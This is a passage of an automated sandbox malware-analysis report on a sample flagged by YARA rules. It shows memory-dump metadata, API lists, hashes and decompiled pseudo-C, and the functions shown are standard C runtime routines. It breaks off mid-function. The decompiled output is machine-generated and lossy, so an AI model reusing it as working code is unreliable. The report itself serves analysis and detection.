                        0x00000000
                        0x0106b40b
                        0x0106b418
                        0x0106b41c
                        0x0106b41e
                        0x0106b44d
                        0x0106b44d
                        0x0106b452
                        0x0106b455
                        0x0106b420
                        0x0106b42e
                        0x0106b430
                        0x00000000
                        0x0106b432
                        0x0106b432
                        0x0106b434
                        0x0106b435
                        0x0106b43c
                        0x0106b442
                        0x0106b446
                        0x0106b44a
                        0x0106b44c
                        0x0106b44c
                        0x0106b430
                        0x0106b41e
                        0x0106b3ee
                        0x0106b3ee
                        0x0106b3ee
                        0x0106b3f5
                        0x0106b3f5

                        APIs
                        • __init_pointers.LIBCMT ref: 0106B3E0
                          • Part of subcall function 010653AC: EncodePointer.KERNEL32(00000000,?,0106B3E5,0106431E,0107DFD8,00000014), ref: 010653AF
                          • Part of subcall function 010653AC: __initp_misc_winsig.LIBCMT ref: 010653D0
                        • __mtinitlocks.LIBCMT ref: 0106B3E5
                          • Part of subcall function 01064E88: InitializeCriticalSectionAndSpinCount.KERNEL32(010803F8,00000FA0,?,?,0106B3EA,0106431E,0107DFD8,00000014), ref: 01064EA6
                        • __mtterm.LIBCMT ref: 0106B3EE
                        • __calloc_crt.LIBCMT ref: 0106B413
                        • __initptd.LIBCMT ref: 0106B435
                        • GetCurrentThreadId.KERNEL32 ref: 0106B43C
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                        • String ID:
                        • API String ID: 2211675822-0
                        • Opcode ID: cbf9d27e79999a317173a0e713e8020ad2be0268aa6f239349e5c38e0918410f
                        • Instruction ID: 7789b4e8aa9c632ad8694f532c391716a801157ad41010afb9af6e60e1eb202e
                        • Opcode Fuzzy Hash: cbf9d27e79999a317173a0e713e8020ad2be0268aa6f239349e5c38e0918410f
                        • Instruction Fuzzy Hash: CAF090B27497239AE7B43B387C06ADA3ACCDF21635F204A5AF8D4D50C4EF6184428254
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01061A90 Relevance: 10.1, APIs: 8, Instructions: 74memorystringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E01061A90(void* __eflags, signed int _a4, long* _a8, long* _a12) {
				void* _t21;
				int _t22;
				void* _t26;
				signed int _t27;
				long _t29;
				signed int _t30;
				long* _t31;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				signed int _t40;
				void* _t42;

				_t35 = _a4;
				 *_a8 = 0;
				 *_a12 = 0;
				_t21 = E01061640(_t35, 0);
				_t22 = lstrlenW(_t35);
				_t26 = HeapAlloc(GetProcessHeap(), 0, 2 + (_t22 + _t21) * 2);
				_t42 = _t26;
				if(_t42 == 0) {
					return _t26;
				} else {
					_t27 = E01061640(_t35, _t42);
					_a4 = _t27;
					_t29 = HeapAlloc(GetProcessHeap(), 0, 4 + _t27 * 4);
					_t36 = _t29;
					if(_t36 != 0) {
						_t30 = _a4;
						_t40 = 0;
						if(_t30 <= 0) {
							L6:
							 *(_t36 + _t40 * 4) = 0;
							 *_a8 = _t30;
							_t31 = _a12;
							 *_t31 = _t36;
							return _t31;
						}
						do {
							 *(_t36 + _t40 * 4) = _t42;
							_t32 = lstrlenW(_t42);
							_t30 = _a4;
							_t40 = _t40 + 1;
							_t42 = _t42 + _t32 * 2 + 2;
						} while (_t40 < _t30);
						goto L6;
					}
					return HeapFree(GetProcessHeap(), _t29, _t42);
				}
			}















                        0x01061a97
                        0x01061a9c
                        0x01061aa8
                        0x01061aae
                        0x01061ab6
                        0x01061ad1
                        0x01061ad7
                        0x01061adb
                        0x01061b4d
                        0x01061add
                        0x01061adf
                        0x01061aee
                        0x01061af4
                        0x01061afa
                        0x01061afe
                        0x01061b12
                        0x01061b15
                        0x01061b19
                        0x01061b38
                        0x01061b3b
                        0x01061b42
                        0x01061b44
                        0x01061b47
                        0x00000000
                        0x01061b47
                        0x01061b20
                        0x01061b21
                        0x01061b24
                        0x01061b2d
                        0x01061b30
                        0x01061b31
                        0x01061b34
                        0x00000000
                        0x01061b20
                        0x01061b0f
                        0x01061b0f

                        APIs
                        • lstrlenW.KERNEL32(?), ref: 01061AB6
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061ACE
                        • HeapAlloc.KERNEL32(00000000), ref: 01061AD1
                        • GetProcessHeap.KERNEL32(00000000), ref: 01061AF1
                        • HeapAlloc.KERNEL32(00000000), ref: 01061AF4
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061B02
                        • HeapFree.KERNEL32(00000000), ref: 01061B05
                        • lstrlenW.KERNEL32(00000000), ref: 01061B24
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$Process$Alloclstrlen$Free
                        • String ID:
                        • API String ID: 1242203261-0
                        • Opcode ID: 48eba48b9f8cc5c384709479db6d853e69b72b6ba9a75d6894c67b37ac32f9de
                        • Instruction ID: c20c9f97517295658b83cd62faf7575040e2e70fe348ae006dd91f9ee83db3b5
                        • Opcode Fuzzy Hash: 48eba48b9f8cc5c384709479db6d853e69b72b6ba9a75d6894c67b37ac32f9de
                        • Instruction Fuzzy Hash: FB2151B6600219ABD7219F69EC88F9F7BACEF89350F014011FA45DB214D635E900CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01074BD2 Relevance: 9.1, APIs: 6, Instructions: 136COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E01074BD2(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t50;
				signed int _t53;
				signed int _t54;
				signed int _t59;
				void* _t64;
				signed int _t66;
				void* _t68;
				signed int _t75;
				signed int _t79;
				signed short _t80;
				signed int _t82;
				void* _t83;
				signed int _t90;
				void* _t91;
				signed int _t92;
				signed int _t94;
				signed int* _t97;

				_t46 = E01066594(_t45);
				if(_t46 >= 0) {
					_t97 = _a8;
					_t47 = E01065573(_t97);
					_t79 = _t97[3];
					_t94 = _t47;
					__eflags = _t79 & 0x00000082;
					if(__eflags != 0) {
						__eflags = _t79 & 0x00000040;
						if(__eflags == 0) {
							_t75 = 0;
							__eflags = _t79 & 0x00000001;
							if((_t79 & 0x00000001) == 0) {
								L10:
								_t50 = _t97[3] & 0xffffffef | 0x00000002;
								_t97[3] = _t50;
								_t97[1] = _t75;
								__eflags = _t50 & 0x0000010c;
								if((_t50 & 0x0000010c) == 0) {
									_t64 = E01062E24();
									__eflags = _t97 - _t64 + 0x20;
									if(_t97 == _t64 + 0x20) {
										L13:
										_t66 = E0106FFFD(_t94);
										__eflags = _t66;
										if(_t66 == 0) {
											goto L14;
										}
									} else {
										_t68 = E01062E24();
										__eflags = _t97 - _t68 + 0x40;
										if(_t97 != _t68 + 0x40) {
											L14:
											E01070A65(_t97);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t97[3] & 0x00000108;
								if(__eflags == 0) {
									_v12 = _a4;
									_push(2);
									_push( &_v12);
									_push(_t94);
									_v8 = 2;
									_t53 = E0106BEF0(_t75, _t91, _t94, _t97, __eflags);
									_t80 = _a4;
									_t75 = _t53;
									goto L27;
								} else {
									_t92 = _t97[2];
									 *_t97 = _t92 + 2;
									_t82 =  *_t97 - _t92;
									_v8 = _t82;
									_t97[1] = _t97[6] - 2;
									__eflags = _t82;
									if(__eflags <= 0) {
										__eflags = _t94 - 0xffffffff;
										if(_t94 == 0xffffffff) {
											L22:
											_t83 = 0x1080520;
										} else {
											__eflags = _t94 - 0xfffffffe;
											if(_t94 == 0xfffffffe) {
												goto L22;
											} else {
												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x1081c60 + (_t94 >> 5) * 4));
											}
										}
										__eflags =  *(_t83 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t75);
											_push(_t75);
											_push(_t94);
											_t59 = E01067780(_t75, _t94, _t97, __eflags);
											__eflags = (_t59 & _t92) - 0xffffffff;
											if((_t59 & _t92) == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t82);
										_push(_t92);
										_push(_t94);
										_t75 = E0106BEF0(_t75, _t92, _t94, _t97, __eflags);
										L25:
										_t80 = _a4;
										 *(_t97[2]) = _t80;
										L27:
										__eflags = _t75 - _v8;
										if(_t75 == _v8) {
											_t54 = _t80 & 0x0000ffff;
										} else {
											L28:
											_t43 =  &(_t97[3]);
											 *_t43 = _t97[3] | 0x00000020;
											__eflags =  *_t43;
											goto L29;
										}
									}
								}
							} else {
								_t97[1] = 0;
								__eflags = _t79 & 0x00000010;
								if((_t79 & 0x00000010) == 0) {
									_t97[3] = _t79 | 0x00000020;
									L29:
									_t54 = 0xffff;
								} else {
									_t90 = _t79 & 0xfffffffe;
									__eflags = _t90;
									 *_t97 = _t97[2];
									_t97[3] = _t90;
									goto L10;
								}
							}
						} else {
							 *((intOrPtr*)(E010647CC(__eflags))) = 0x22;
							goto L6;
						}
					} else {
						 *((intOrPtr*)(E010647CC(__eflags))) = 9;
						L6:
						_t97[3] = _t97[3] | 0x00000020;
						_t54 = 0xffff;
					}
					return _t54;
				} else {
					return _t46 | 0xffffffff;
				}
			}





























                        0x01074bd7
                        0x01074bde
                        0x01074be6
                        0x01074beb
                        0x01074bf1
                        0x01074bf4
                        0x01074bf6
                        0x01074bf9
                        0x01074c08
                        0x01074c0b
                        0x01074c27
                        0x01074c29
                        0x01074c2c
                        0x01074c41
                        0x01074c47
                        0x01074c4a
                        0x01074c4d
                        0x01074c50
                        0x01074c55
                        0x01074c57
                        0x01074c5f
                        0x01074c61
                        0x01074c6f
                        0x01074c70
                        0x01074c76
                        0x01074c78
                        0x00000000
                        0x00000000
                        0x01074c63
                        0x01074c63
                        0x01074c6b
                        0x01074c6d
                        0x01074c7a
                        0x01074c7b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01074c6d
                        0x01074c61
                        0x01074c81
                        0x01074c88
                        0x01074d0a
                        0x01074d0e
                        0x01074d13
                        0x01074d14
                        0x01074d15
                        0x01074d1c
                        0x01074d21
                        0x01074d27
                        0x00000000
                        0x01074c8a
                        0x01074c8a
                        0x01074c92
                        0x01074c97
                        0x01074c9c
                        0x01074c9f
                        0x01074ca2
                        0x01074ca4
                        0x01074cbd
                        0x01074cc0
                        0x01074cdd
                        0x01074cdd
                        0x01074cc2
                        0x01074cc2
                        0x01074cc5
                        0x00000000
                        0x01074cc7
                        0x01074cd4
                        0x01074cd4
                        0x01074cc5
                        0x01074ce2
                        0x01074ce6
                        0x00000000
                        0x01074ce8
                        0x01074ce8
                        0x01074cea
                        0x01074ceb
                        0x01074cec
                        0x01074ced
                        0x01074cf7
                        0x01074cfa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01074cfa
                        0x01074ca6
                        0x01074ca6
                        0x01074ca7
                        0x01074ca8
                        0x01074cb1
                        0x01074cfc
                        0x01074cff
                        0x01074d02
                        0x01074d29
                        0x01074d29
                        0x01074d2c
                        0x01074d39
                        0x01074d2e
                        0x01074d2e
                        0x01074d2e
                        0x01074d2e
                        0x01074d2e
                        0x00000000
                        0x01074d2e
                        0x01074d2c
                        0x01074ca4
                        0x01074c2e
                        0x01074c2e
                        0x01074c31
                        0x01074c34
                        0x01074cb8
                        0x01074d32
                        0x01074d32
                        0x01074c36
                        0x01074c39
                        0x01074c39
                        0x01074c3c
                        0x01074c3e
                        0x00000000
                        0x01074c3e
                        0x01074c34
                        0x01074c0d
                        0x01074c12
                        0x00000000
                        0x01074c12
                        0x01074bfb
                        0x01074c00
                        0x01074c18
                        0x01074c18
                        0x01074c1c
                        0x01074c1c
                        0x01074d40
                        0x01074be0
                        0x01074be4
                        0x01074be4

                        APIs
                        • __ioinit.LIBCMT ref: 01074BD7
                          • Part of subcall function 01066594: InitOnceExecuteOnce.KERNEL32(01081050,010665CF,00000000,00000000,01062FAF,0107DF38,0000000C,01062146,-00000040,Unknown option "%c" in Advertise mode), ref: 010665A2
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Once$ExecuteInit__ioinit
                        • String ID:
                        • API String ID: 129814473-0
                        • Opcode ID: 4180551170cf64d5314b2087420eadfc3fe243bf76dd7a9d551d1322a2f5b80a
                        • Instruction ID: 1610157736473a1e1fae61af9aeaa4d07d59c8a1a30f03a90ba830bb9c5c767e
                        • Opcode Fuzzy Hash: 4180551170cf64d5314b2087420eadfc3fe243bf76dd7a9d551d1322a2f5b80a
                        • Instruction Fuzzy Hash: 74416871E0070A9FE7749F6CC881ABA7BE8AF41320F00866DE5E6C76C1D774D8008B18
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0106793B Relevance: 9.1, APIs: 6, Instructions: 134COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E0106793B(void* __eflags, signed char _a4, signed int* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				signed int* _t92;

				_t44 = E01066594(_t43);
				if(_t44 >= 0) {
					_t92 = _a8;
					_t45 = E01065573(_t92);
					_t74 = _t92[3];
					_t89 = _t45;
					__eflags = _t74 & 0x00000082;
					if(__eflags != 0) {
						__eflags = _t74 & 0x00000040;
						if(__eflags == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t48 = _t92[3] & 0xffffffef | 0x00000002;
								_t92[3] = _t48;
								_t92[1] = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E01062E24();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E0106FFFD(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E01062E24();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E01070A65(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t92[3] & 0x00000108;
								if((_t92[3] & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E0106BEF0(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t87 = _t92[2];
									 *_t92 = _t87 + 1;
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									_t92[1] = _t92[6] - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0x1080520;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x1081c60 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E01067780(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E0106BEF0(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t45 = _a4;
										 *(_t92[2]) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 =  &(_t92[3]);
											 *_t40 = _t92[3] | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								_t92[1] = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									_t92[3] = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 = _t92[2];
									_t92[3] = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E010647CC(__eflags);
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E010647CC(__eflags);
						 *_t67 = 9;
						L6:
						_t92[3] = _t92[3] | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}


























                        0x0106793f
                        0x01067946
                        0x0106794e
                        0x01067953
                        0x01067959
                        0x0106795c
                        0x0106795e
                        0x01067961
                        0x01067970
                        0x01067973
                        0x0106798d
                        0x0106798f
                        0x01067992
                        0x010679a7
                        0x010679ad
                        0x010679b0
                        0x010679b3
                        0x010679b6
                        0x010679bb
                        0x010679bd
                        0x010679c5
                        0x010679c7
                        0x010679d5
                        0x010679d6
                        0x010679dc
                        0x010679de
                        0x00000000
                        0x00000000
                        0x010679c9
                        0x010679c9
                        0x010679d1
                        0x010679d3
                        0x010679e0
                        0x010679e1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x010679d3
                        0x010679c7
                        0x010679e7
                        0x010679ee
                        0x01067a6c
                        0x01067a6d
                        0x01067a6e
                        0x01067a74
                        0x01067a75
                        0x01067a76
                        0x01067a7e
                        0x00000000
                        0x010679f0
                        0x010679f0
                        0x010679f8
                        0x010679fd
                        0x01067a00
                        0x01067a03
                        0x01067a06
                        0x01067a08
                        0x01067a21
                        0x01067a24
                        0x01067a41
                        0x01067a41
                        0x01067a26
                        0x01067a26
                        0x01067a29
                        0x00000000
                        0x01067a2b
                        0x01067a38
                        0x01067a38
                        0x01067a29
                        0x01067a46
                        0x01067a4a
                        0x00000000
                        0x01067a4c
                        0x01067a4c
                        0x01067a4e
                        0x01067a4f
                        0x01067a50
                        0x01067a56
                        0x01067a5b
                        0x01067a5e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01067a5e
                        0x01067a0a
                        0x01067a0a
                        0x01067a0b
                        0x01067a0c
                        0x01067a15
                        0x01067a60
                        0x01067a63
                        0x01067a66
                        0x01067a80
                        0x01067a80
                        0x01067a83
                        0x01067a8e
                        0x01067a85
                        0x01067a85
                        0x01067a85
                        0x01067a85
                        0x01067a85
                        0x00000000
                        0x01067a85
                        0x01067a83
                        0x01067a08
                        0x01067994
                        0x01067994
                        0x01067997
                        0x0106799a
                        0x01067a1c
                        0x01067a89
                        0x01067a89
                        0x0106799c
                        0x0106799f
                        0x0106799f
                        0x010679a2
                        0x010679a4
                        0x00000000
                        0x010679a4
                        0x0106799a
                        0x01067975
                        0x01067975
                        0x0106797a
                        0x00000000
                        0x0106797a
                        0x01067963
                        0x01067963
                        0x01067968
                        0x01067980
                        0x01067980
                        0x01067984
                        0x01067984
                        0x01067a96
                        0x01067948
                        0x0106794c
                        0x0106794c

                        APIs
                        • __ioinit.LIBCMT ref: 0106793F
                          • Part of subcall function 01066594: InitOnceExecuteOnce.KERNEL32(01081050,010665CF,00000000,00000000,01062FAF,0107DF38,0000000C,01062146,-00000040,Unknown option "%c" in Advertise mode), ref: 010665A2
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Once$ExecuteInit__ioinit
                        • String ID:
                        • API String ID: 129814473-0
                        • Opcode ID: a5e7b5880d0677273ea32939c4bcc670a41777519683311dcaa630fee2232a78
                        • Instruction ID: f43c7404a44f9850386674598a63ed7ce2cd16e4b5c1863153e69f98d1c160e3
                        • Opcode Fuzzy Hash: a5e7b5880d0677273ea32939c4bcc670a41777519683311dcaa630fee2232a78
                        • Instruction Fuzzy Hash: EC411171510B029FD7249BACC891ABE7BEC9F85338F04875DE5E6C62C1E634DA408B21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004029C1 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E004029C1(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x415040 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00402CA4(_t13,  *0x415040);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E00402CDF(_t14,  *0x415040, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E004057DE();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E00402CDF(_t18,  *0x415040, 0);
								} else {
									_t8 = E00402CDF(_t18,  *0x415040, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E0040571A(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}











                        0x004029c1
                        0x004029c8
                        0x004029db
                        0x004029e2
                        0x004029e4
                        0x004029e8
                        0x00402a01
                        0x00402a01
                        0x004029ea
                        0x004029ec
                        0x004029ff
                        0x00402a06
                        0x00402a0f
                        0x00402a12
                        0x00402a15
                        0x00402a29
                        0x00402a29
                        0x00402a32
                        0x00402a17
                        0x00402a1e
                        0x00402a24
                        0x00402a27
                        0x00402a3b
                        0x00402a3d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402a27
                        0x00402a40
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004029ff
                        0x004029ec
                        0x00402a48
                        0x00402a52
                        0x004029ca
                        0x004029cc
                        0x004029cc

                        APIs
                        • GetLastError.KERNEL32(?,?,004029B8,004027E8,00401E66), ref: 004029CF
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004029DD
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004029F6
                        • SetLastError.KERNEL32(00000000,004029B8,004027E8,00401E66), ref: 00402A48
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
                        • Instruction ID: 078a338927bebc8a57084cdf0b2594a36b0b0cb36656b2d2252d312e3d5e2cf0
                        • Opcode Fuzzy Hash: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
                        • Instruction Fuzzy Hash: FA012832308A119EE63566B9AE8D5AB2F44EB45338B20023FF510755E1EFFD4C01699C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404F84 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 25%
                        			E00404F84(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x415010; // 0xcf17a32a
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x40d42f, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x40e160(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}











                        0x00404f99
                        0x00404fa4
                        0x00404faa
                        0x00404fae
                        0x00404fb9
                        0x00404fc1
                        0x00404fcb
                        0x00404fd1
                        0x00404fd5
                        0x00404fdc
                        0x00404fe2
                        0x00404fe2
                        0x00404fd5
                        0x00404fe8
                        0x00404fed
                        0x00404fed
                        0x00404ff6
                        0x00405000

                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,CF17A32A,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FB9
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00404FCB
                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FED
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
                        • Instruction ID: f45cf89818bd8daf17f7f5fa5db09656c02fb6dca8b021926776a3611c212177
                        • Opcode Fuzzy Hash: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
                        • Instruction Fuzzy Hash: 1101A771914626EBDB119F51DC05FAEBBB8FB44715F00493AE811B22D0DBB89900CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00409AC0 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                        Download Yara Rule
                        C-Code - Quality: 58%
                        			E00409AC0(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				intOrPtr _t45;
				signed int _t48;
				void* _t51;
				signed int _t55;
				intOrPtr _t64;
				intOrPtr _t69;
				void* _t72;
				intOrPtr _t73;
				intOrPtr _t89;
				void* _t90;
				intOrPtr* _t92;
				void* _t94;
				intOrPtr* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t40 =  *0x415010; // 0xcf17a32a
				_v8 = _t40 ^ _t96;
				_t89 = _a20;
				if(_t89 > 0) {
					_t69 = E0040AE45(_a16, _t89);
					_t103 = _t69 - _t89;
					_t4 = _t69 + 1; // 0x1
					_t89 = _t4;
					if(_t103 >= 0) {
						_t89 = _t69;
					}
				}
				_t71 = _a32;
				if(_a32 == 0) {
					_t71 =  *((intOrPtr*)( *_a4 + 8));
